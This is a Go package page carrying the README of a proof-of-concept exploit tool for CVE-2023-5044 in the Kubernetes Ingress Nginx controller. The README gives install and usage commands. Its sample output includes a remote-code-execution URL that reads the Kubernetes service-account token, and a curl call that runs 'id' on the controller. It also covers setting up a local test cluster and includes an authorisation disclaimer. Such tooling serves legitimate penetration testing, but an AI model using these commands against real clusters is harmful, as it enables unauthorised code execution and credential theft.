cve-2023-5044

command module

v0.0.0-...-3b4771d Latest Latest Go to latest Published: Jan 29, 2024 License: GPL-3.0 Imports: 1 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/4armed/cve-2023-5044

Links

Open Source Insights

README ¶

CVE-2023-5044 Ingress Nginx Exploit Proof-Of-Concept

This is a quick Go program to exploit the recent CVE in the Ingress Nginx controller.

Details on how to do this are already out there via Rory McCune's blog at https://raesene.github.io/blog/2023/10/29/exploiting-CVE-2023-5044/, this just automates the process a little and tidies up the exploit so that it is a more flexible, generic remote code execution payload.

Installation

% go install github.com/4armed/cve-2023-5044@latest

Test Cluster

You will need a cluster to run it against, running a vulnerable version of ingress-nginx (obvs). If you don't have one you're testing against, you can create a Kind cluster by cloning this repo and using the Makefile in the deploy folder.

% git clone github.com/4armed/cve-2023-5044
% cd cve-2023-5044/deploy && make up

If you leave the kind.yaml file as-is you'll have a cluster bound to your localhost on port 30080 and 30443.

Usage

% cve-2023-5044 run -u http://localhost:30080
2024/01/17 14:10:48 INFO checking permissions
2024/01/17 14:10:48 INFO created ingress object namespace=default name=forearmed-poc-hm48l
2024/01/17 14:10:48 INFO exploit at http://localhost:30080/4armed?cmd=cat+%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken"

The "checking permissions" line is because the tool does a Subject Access Review to check you have permissions to create an ingress. If you don't it will exit at that point. If you have edit access to an existing ingress you can certainly use the exploit to achieve a compromise but it's far too complex to automate the updating of an existing ingress without breaking stuff.

The default path to trigger the exploit is /4armed and it reads and executes the value of the cmd query string parameter.

It will print out an example URL with the default command cat /var/run/secrets/kubernetes.io/serviceaccount/token. You can change this with the -e flag or just supply a different value in the cmd parameter. The exploit isn't hard-coded. You don't need to deploy a new ingress.

%  curl 'http://localhost:30080/4armed?cmd=id'
uid=101(www-data) gid=82(www-data)

The ingress object name is randomised using GenerateName so pay attention to the output and clean up after yourself.

% kubectl delete ingress forearmed-poc-hm48l
ingress.networking.k8s.io "forearmed-poc-hm48l" deleted

If you just want to generate the ingress object use:

% cve-2023-5044 generate

Disclaimer

This is for testing purposes only against a cluster for which you have authorisation. If you use it against a cluster, whether you have permission or not, the author does not accept any responsibility for any damage or issues caused. Every care has been take to choose path values which don't conflict with existing ones, you can override these with flags or change the code if needed, but you still might break something. Make sure you know what you are doing.

Documentation ¶

There is no documentation for this package.

Source Files ¶

View all Source files

main.go

Directories ¶

Path	Synopsis
cmd
pkg
poc

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL